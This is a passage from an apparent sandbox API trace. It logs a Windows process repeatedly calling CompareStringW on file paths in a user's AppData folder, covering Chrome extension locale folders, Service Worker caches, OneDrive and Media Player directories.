Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\", cchCount2=133) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\", cchCount2=131) returned 3 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\", cchCount2=131) returned 3 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\", cchCount2=131) returned 3 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\", cchCount2=131) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\", cchCount2=131) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\", cchCount2=132) returned 3 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\", cchCount2=132) returned 3 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\", cchCount2=132) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\", cchCount2=132) returned 3 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\", cchCount2=132) returned 3 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\", cchCount2=132) returned 3 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\", cchCount2=132) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\", cchCount2=132) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\", cchCount2=132) returned 3 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\", cchCount2=132) returned 3 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\", cchCount2=132) returned 3 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\", cchCount2=132) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\", cchCount2=132) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\", cchCount2=132) returned 3 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount2=174) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount2=174) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount2=174) returned 3 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount2=174) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount2=174) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\", cchCount2=139) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\", cchCount2=139) returned 3 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\", cchCount2=139) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\", cchCount2=139) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\", cchCount2=139) returned 3 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\", cchCount2=77) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\", cchCount2=77) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\", cchCount2=77) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\", cchCount2=77) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\", cchCount2=77) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\", cchCount2=73) returned 1 [0290.740] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\", cchCount2=73) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\", cchCount2=73) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\", cchCount2=73) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\", cchCount1=77, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\", cchCount2=73) returned 3 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\", cchCount2=130) returned 3 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\", cchCount2=130) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\", cchCount2=130) returned 3 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\", cchCount2=130) returned 3 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\", cchCount2=130) returned 3 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\", cchCount2=132) returned 3 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\", cchCount2=132) returned 3 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\", cchCount2=132) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\", cchCount2=132) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\", cchCount2=132) returned 3 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\", cchCount2=132) returned 3 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\", cchCount2=132) returned 3 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\", cchCount2=132) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\", cchCount2=132) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\", cchCount2=132) returned 3 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount2=138) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount2=138) returned 2 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 